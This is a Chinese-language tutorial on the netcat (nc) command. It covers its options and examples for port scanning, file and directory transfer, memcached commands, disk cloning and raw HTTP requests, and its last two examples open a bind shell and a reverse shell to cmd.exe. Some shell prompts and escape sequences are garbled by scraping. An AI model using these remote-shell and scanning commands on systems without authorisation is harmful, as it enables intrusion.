linux nc命令使用詳解 功能說明：功能強大的網路工具 語　　法：nc [-hlnruz][-g<閘道器...>][-G<指向器數目>][-i<延遲秒數>][-o<輸出檔案>][-p<通訊埠>][-s<來源位址>][-v...][-w<超時秒數>][主機名稱][通訊埠...] 參　　數： -g<閘道器>  設定路由器躍程通訊閘道器，最丟哦可設定8個。 -G<指向器數目>  設定來源路由指向器，其數值為4的倍數。 -h  線上幫助。 -i<延遲秒數>  設定時間間隔，以便傳送資訊及掃描通訊埠。 -l  使用監聽模式，管控傳入的資料。 -n  直接使用IP地址，而不通過域名伺服器。 -o<輸出檔案>  指定檔名稱，把往來傳輸的資料以16進位制字碼傾倒成該檔案儲存。 -p<通訊埠>  設定本地主機使用的通訊埠。 -r  亂數指定本地與遠端主機的通訊埠。 -s<來源位址>  設定本地主機送出資料包的IP地址。 -u  使用UDP傳輸協議。 -v 詳細輸出--用兩個-v可得到更詳細的內容 -w<超時秒數>  設定等待連線的時間。 -z  使用0輸入/輸出模式，只在掃描通訊埠時使用。 nc使用示例 1. 埠掃描 # nc -v -w 2 192.168.2.34 -z 21-24 nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused Connection to 192.168.2.34 22 port [tcp/ssh] succeeded! nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused 2. 從192.168.2.33拷貝檔案到192.168.2.34 在192.168.2.34上： nc -l 1234 > test.txt 在192.168.2.33上： nc 192.168.2.34 < test.txt 3. 簡單聊天工具 在192.168.2.34上： nc -l 1234 在192.168.2.33上： nc 192.168.2.34 1234 這樣，雙方就可以相互交流了。使用ctrl+C(或D）退出。 4. 用nc命令操作memcached 1）儲存資料：printf “set key 0 10 6rnresultrn” |nc 192.168.2.34 11211 2）獲取資料：printf “get keyrn” |nc 192.168.2.34 11211 3）刪除資料：printf “delete keyrn” |nc 192.168.2.34 11211 4）檢視狀態：printf “statsrn” |nc 192.168.2.34 11211 5）模擬top命令檢視狀態：watch “echo stats” |nc 192.168.2.34 11211 6）清空快取：printf “flush_allrn” |nc 192.168.2.34 11211 (小心操作，清空了快取就沒了） 5. nc -p 1234 -w 5 host.example.com 80 建立從本地1234埠到host.example.com的80埠連線，5秒超時 nc -u host.example.com 53 u為UDP連線 6. echo -n "GET / HTTP/1.0"r"n"r"n" | nc host.example.com 80 連線到主機並執行 7. nc -v -z host.example.com 70-80 掃描埠(70到80)，可指定範圍。-v輸出詳細資訊。 8. 遠端拷貝檔案 從server1拷貝檔案到server2上。需要先在server2上，用nc啟用監聽， server2上執行：

[email protected] tmp]# nc -lp 1234 > install.log server1上執行： [[email protected] ~]# ll install.log -rw-r–r–  1 root root 39693 12月 20  2007 install.log [[email protected] ~]# nc -w 1 192.168.228.222 1234 < install.log 9. 克隆硬碟或分割槽 操作與上面的拷貝是雷同的，只需要由dd獲得硬碟或分割槽的資料，然後傳輸即可。 克隆硬碟或分割槽的操作，不應在已經mount的的系統上進行。所以，需要使用安裝光碟引導後，進入拯救模式（或使用Knoppix工 具光碟）啟動系統後，在server2上進行類似的監聽動作： # nc -l -p 1234 | dd of=/dev/sda server1上執行傳輸，即可完成從server1克隆sda硬碟到server2的任務： # dd if=/dev/sda | nc 192.168.228.222 1234 ※ 完成上述工作的前提，是需要落實光碟的拯救模式支援伺服器上的網絡卡，並正確配置IP。 10. 儲存Web頁面 # while true; do nc -l -p 80 -q 1 < somepage.html; done 11. 模擬HTTP Headers,獲取網頁原始碼和返回頭部資訊 [

[email protected] ~]# nc www.linuxso.com 80 GET / HTTP/1.1 Host: ispconfig.org Referrer: mypage.com User-Agent: my-browser HTTP/1.1 200 OK Date: Tue, 16 Dec 2008 07:23:24 GMT Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8 Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/ Expires: 0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Cache-Control: private, post-check=0, pre-check=0, max-age=0 Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/ Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/

html [......] 在nc命令後，輸入紅色部分的內容，然後按兩次回車，即可從對方獲得HTTP Headers內容。 12. 傳輸目錄 從server1拷貝nginx-0.6.34目錄內容到server2上。需要先在server2上，用nc啟用監聽，server2上執行： 引用 [[email protected] tmp]# nc -l 1234 |tar xzvf - server1上執行： 引用 [[email protected] ~]# ll -d nginx-0.6.34 drwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34 [[email protected] ~]# tar czvf – nginx-0.6.34|nc 192.168.228.222 1234 13.REMOTE主機繫結SHELL 例子： 格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 講解：繫結REMOTE主機的CMDSHELL在REMOTE主機的TCP5354埠 14.REMOTE主機繫結SHELL並反向連線 例子： 格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 講解：繫結REMOTE主機的CMDSHELL並反向連線到192.168.x.x的TCP5354埠 以上為最基本的幾種用法（其實NC的用法還有很多， 當配合管道命令"|"與重定向命令"<"、">"等等命令功能更強大......）。